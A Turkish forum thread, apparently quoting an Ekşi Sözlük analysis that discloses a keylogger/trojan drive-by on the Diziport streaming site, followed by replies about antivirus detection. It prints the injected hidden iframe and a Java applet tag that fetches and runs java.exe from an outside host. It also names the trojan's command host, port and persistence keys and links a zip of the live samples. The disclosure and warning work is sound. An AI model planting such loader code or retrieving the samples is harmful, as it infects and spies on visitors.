Diziport'ta Tespit Edilen Keylogger
-
daha bu sabah tesadüfen bir tweet sayesinde olayı gördüm. incelenmesi ve sonuçlarına göre hareket edilmesi gerekilen bir durum..
kaynak : http://www.eksisozluk.com/show.asp?id=26061448
alıntı :
"windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, kullanicilarin klavyelerinde bastiklari her tusu (sifreler, mesajlar vb, bir dosyaya kaydedip o dosyayi baskasina yolluyor) (bkz: keylogger)
(cok uzun lan bu okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)
nasil bir sey yaptiklarini birlikte gorelim.
sitenin kaynak kodunda,
--- kod 1---
<a href="http://twitter.com/diziport" title="" style="font-size:12px;"><iframe name="java" src="www.metinozdogan.com.tr/java/" width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
--- kod 1 ---
seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)
peki bu sayfada ne var? "www.metinozdogan.com.tr/java/client.jar" seklinde bir java applet'i yukleyen bir kod. (dosya silinmis ama entry'nin devaminda butun bu dosyalar indirilebilir)
--- kod 2 ---
<applet code='javaupdater.class' width='1' height='1' archive='www.metinozdogan.com.tr/java/client.jar'>
<param name="url" value="www.medyaturk24.com/java/java.exe" />
</applet>
--- kod 2 ---
peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:
--- kod 3 ---
http://pastebin.com/bmfv8xfp
--- kod 3 ---
peki bu java kodu ne yapiyor biraz aciklayacak olursak,
1) (windows bilgisayarlarda) c:\documents and settings\kullaniciadiniz\rundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.
2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan www.medyaturk24.com/java/java.exe (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.
3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).
http://www.medyaturk24.com/java/ adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)
olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip http://ge.tt/9dzsvf9 adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.
java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya (https://www.facebook.com/unlemisareti) (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.
saygilar.
~~~~~~~~~~~~~~~~~~~~~~~
devami unpacked adli sozluk yazarindan geliyor, helal olsun adam ugrasmis.
--- spoiler ---
java.exe sunlari yapiyor:
enigma protector isimli bir yazılımla uygulamayı şifreleyerek antivirüslerden kaçmaya çalışmış ama pek başarılı olamamış sağlam antivirüsler tanıyor hatta 2 kere şifreleme yapılmış. önce aspack isimli uygulama ile (ki asıl dosya bu). sonra onu temp klasörüne çıkarıp çalıştıracak dosyayı da enigma ile şifrelemiş.
bilgisayara uzaktan erişmeyi sağlayan bir trojan bu. tipik trojan hareketi olarak kendini varsayılan tarayıcı gibi gösteriyor processlerde. ayrıca tarayıcı kapanırsa diye yedek olarak svchost.exe'nin de içine giriyor.
kendini c:\?windows\?system32\?installdir\?nod.exe olarak kopyalıyor ve bunu bilgisayar başlangıcında açılacak şekilde ayarlıyor. bu büyük ihtimal uac etkin olan sistemlerde c:\users\user\appdata\roaming\nod.exe olur.
yine klasik trojan hareketi olarak registry'de local machine ve current user/software/microsoft/currentversion/run ve local machine/software/microsoft/?active setup/?installed components yerlerine yazarak yapıyor başlangıçta açılma ayarını. installed components altındaki keyi ?{8b51u067-e68s-ar02-qep7-i1l0440op7h3}
yalnız bu başlangıç bilgilerini trojan çalışırken silmek işe yaramaz. yeniler sürekli. önce nod.exe kaldırılmalı.
trojan sahibine ulaşmak için stapler4445.no-ip.org adresinden ip bilgisini alıyor. o dns adresi trojanın sahibinin bağlantısını açıp kapadığında falan değişen ip adresini güncel olarak tutuyor. işte trojan da o ip adresine bağlanıp sahibinin listesinde bağlanılabilir olarak görülüyor. kullandığı port 3361.
keylog bilgilerini yani bastığın her tuşun kaydedildiği dosya c:\documents and settings\user\application data\microsoft\windows\uwcuemzbapecg.dat burada tutuluyor bu vista ve üzerinde değişir tabi. c:\users\user\appdata\ içinde bir yerlerde olur. şu uwcuemzbapecg kısmı da bilgisayara göre değişebilir bir ihtimal.
--- spoiler ---
onemli not: buyuk ihtimal bu siteye windows makinayla girdiyseniz virus kapmissiniz demektir. guncel bir anti-virus tarayici program isinizi gorecektir. (bkz: avira) bilgisayariniza full tarama yapin mumkunse." -
güncel keyli kis kullanıyorum. bahsettiğin linklere bastım virüsü tespit etti. fakat sitelerine ortalama 3 - 4 gün önce girdiğimde herhangi bir tespitte bulunmadı.
yani, ya siteye girer girmez çalışmıyor bu, yada bu son 2 günde felan koyup kaldırdılar. zaten eksi de de konu dün açılmış sanırsam.
-
evet hoca ben kendi bilgisayarımda bir şey bulamadım zaten kullanmıyordum ama evdeki diğer bilgisayarda tespit etti dediği yerlerde dosyaları. şimdi en baştan taratıp temizliyorum. içime sinmezse de format atmayı düşünüyorum.
-
Nod32 var bende tarattım bişey bulamadı, geçenlerde girmiştim.. kaspersky mi indirsem acep
-
wardom.com a girdiğimde .com.tr değil sadece .com java felan çıkıyor saatin orda bakarmısınız problemli biriey varmı diye
-
hangi av ler tanımlıyor şu an.. ?
-
Sistemde birşey yapabilmesi için java applet'in önce bizden onay istemesi gerekmiyor mu?
-
sau_nightmare bunu yazdı:
-----------------------------hangi av ler tanımlıyor şu an.. ?
-----------------------------okulun yazılım suitlerinde full mcafee vardı ben onunla buldum rundll'leri.
Jchan bunu yazdı:
-----------------------------
Sistemde birşey yapabilmesi için java applet'in önce bizden onay istemesi gerekmiyor mu?
-----------------------------herhangi bir şeyi onayladığımı hatırlamıyorum :/
-
Olabilirde olmayabilirde , Zamanında cyberhaber.com baya hit alıyodu bekir siteyi crackliyor ama hacklemiyo siteye kendi kodunu koyuyor.Millet site adminine kayıo , tam olarak naptığı hakkında bilgim yok hatırlamıyorum ama siteye kendi kodunu koyduğu doğrudur. Buda böyle birşey olabilir belkide admin kendi koymuştur. Şimdi işler böyle dönüyor millet büyük siteleri crackliyor ama hacklemiyor kendi kodlarını yapıştırıyor:)
-
Jchan bunu yazdı:
-----------------------------Sistemde birşey yapabilmesi için java applet'in önce bizden onay istemesi gerekmiyor mu?
-----------------------------Hayır.
Bu arada konuyl alakasız ama an itibariyle google,'da "stapler4445" i ararsanız Tahribatın ne kadar çabuk indexlendiğini görebilirsiniz, sozlukteki konu hala indexlenmemiş!
-
sau_nightmare bunu yazdı:
-----------------------------hangi av ler tanımlıyor şu an.. ?
-----------------------------Kaspersky dün birseyler yakaldi sildi :) updater diye geliyor